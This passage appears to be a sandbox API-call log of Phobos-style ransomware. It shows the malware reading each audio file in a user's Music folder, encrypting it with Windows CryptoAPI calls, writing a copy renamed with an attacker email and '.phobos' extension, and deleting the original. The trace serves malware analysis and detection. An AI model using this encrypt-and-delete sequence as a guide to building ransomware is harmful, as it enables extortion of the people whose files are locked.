pdwDataLen=0x2a0fa80*=0x18770, dwBufLen=0x18770 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18770) returned 1 [0198.273] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x18770, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x18770, lpOverlapped=0x0) returned 1 [0198.275] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0198.275] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.275] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.275] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.275] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.275] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.275] CloseHandle (hObject=0x118) returned 1 [0198.275] CloseHandle (hObject=0x140) returned 1 [0198.275] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SeKJDfMT02ty2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sekjdfmt02ty2.m4a")) returned 1 [0198.277] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uNDAF7f 4BRf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\undaf7f 4brf.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.277] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4149) returned 1 [0198.277] CloseHandle (hObject=0x140) returned 1 [0198.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uNDAF7f 4BRf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\undaf7f 4brf.m4a")) returned 0x20 [0198.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uNDAF7f 4BRf.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\undaf7f 4brf.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uNDAF7f 4BRf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\undaf7f 4brf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.277] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.277] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uNDAF7f 4BRf.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\undaf7f 4brf.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.278] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.278] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1035, lpOverlapped=0x0) returned 1 [0198.279] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1040, dwBufLen=0x1040 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1040) returned 1 [0198.279] WriteFile (in: hFile=0x118, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1040, lpOverlapped=0x0) returned 1 [0198.280] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0198.280] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.280] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.280] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.280] WriteFile (in: hFile=0x118, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.280] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.280] CloseHandle (hObject=0x140) returned 1 [0198.280] CloseHandle (hObject=0x118) returned 1 [0198.280] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uNDAF7f 4BRf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\undaf7f 4brf.m4a")) returned 1 [0198.281] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\15rwdjF0z.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\15rwdjf0z.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.283] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=27434) returned 1 [0198.283] CloseHandle (hObject=0x118) returned 1 [0198.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\15rwdjF0z.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\15rwdjf0z.mp3")) returned 0x20 [0198.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\15rwdjF0z.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\15rwdjf0z.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\15rwdjF0z.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\15rwdjf0z.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.283] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.283] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\15rwdjF0z.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\15rwdjf0z.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.284] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.284] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.284] ReadFile (in: hFile=0x118, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6b2a, lpOverlapped=0x0) returned 1 [0198.286] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6b30, dwBufLen=0x6b30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6b30) returned 1 [0198.286] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6b30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6b30, lpOverlapped=0x0) returned 1 [0198.287] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0198.287] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.287] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0198.287] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.287] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0198.287] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.287] CloseHandle (hObject=0x118) returned 1 [0198.287] CloseHandle (hObject=0x140) returned 1 [0198.287] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\15rwdjF0z.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\15rwdjf0z.mp3")) returned 1 [0198.288] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\C0G0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\c0g0.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.288] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67003) returned 1 [0198.289] CloseHandle (hObject=0x140) returned 1 [0198.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\C0G0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\c0g0.mp3")) returned 0x20 [0198.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\C0G0.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\c0g0.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\C0G0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\c0g0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.289] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.289] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\C0G0.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\c0g0.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.311] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa329e8) returned 1 [0198.311] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.311] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x105bb, lpOverlapped=0x0) returned 1 [0198.313] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x105c0, dwBufLen=0x105c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x105c0) returned 1 [0198.314] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x105c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x105c0, lpOverlapped=0x0) returned 1 [0198.316] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0198.316] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.316] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0198.316] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.316] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0198.316] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.316] CloseHandle (hObject=0x140) returned 1 [0198.316] CloseHandle (hObject=0x160) returned 1 [0198.316] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\C0G0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\c0g0.mp3")) returned 1 [0198.317] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\tIjO HLUjtHC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\tijo hlujthc.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.522] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=36299) returned 1 [0198.522] CloseHandle (hObject=0x118) returned 1 [0198.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\tIjO HLUjtHC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\tijo hlujthc.mp3")) returned 0x20 [0198.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\tIjO HLUjtHC.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\tijo hlujthc.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\tIjO HLUjtHC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\tijo hlujthc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.523] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.523] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\tIjO HLUjtHC.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\tijo hlujthc.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.523] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.523] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.523] ReadFile (in: hFile=0x118, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8dcb, lpOverlapped=0x0) returned 1 [0198.531] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8dd0, dwBufLen=0x8dd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8dd0) returned 1 [0198.532] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8dd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8dd0, lpOverlapped=0x0) returned 1 [0198.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0198.534] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.534] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.534] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.534] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.534] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.534] CloseHandle (hObject=0x118) returned 1 [0198.534] CloseHandle (hObject=0x15c) returned 1 [0198.534] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\tIjO HLUjtHC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\tijo hlujthc.mp3")) returned 1 [0198.536] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\Gl4LuTbe9Nis6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\gl4lutbe9nis6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.567] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=90752) returned 1 [0198.572] CloseHandle (hObject=0x140) returned 1 [0198.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\Gl4LuTbe9Nis6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\gl4lutbe9nis6.wav")) returned 0x20 [0198.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\Gl4LuTbe9Nis6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\gl4lutbe9nis6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\Gl4LuTbe9Nis6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\gl4lutbe9nis6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.573] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.573] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\Gl4LuTbe9Nis6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\gl4lutbe9nis6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.573] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.573] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16280, lpOverlapped=0x0) returned 1 [0198.585] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16290, dwBufLen=0x16290 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16290) returned 1 [0198.585] WriteFile (in: hFile=0x118, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16290, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16290, lpOverlapped=0x0) returned 1 [0198.587] 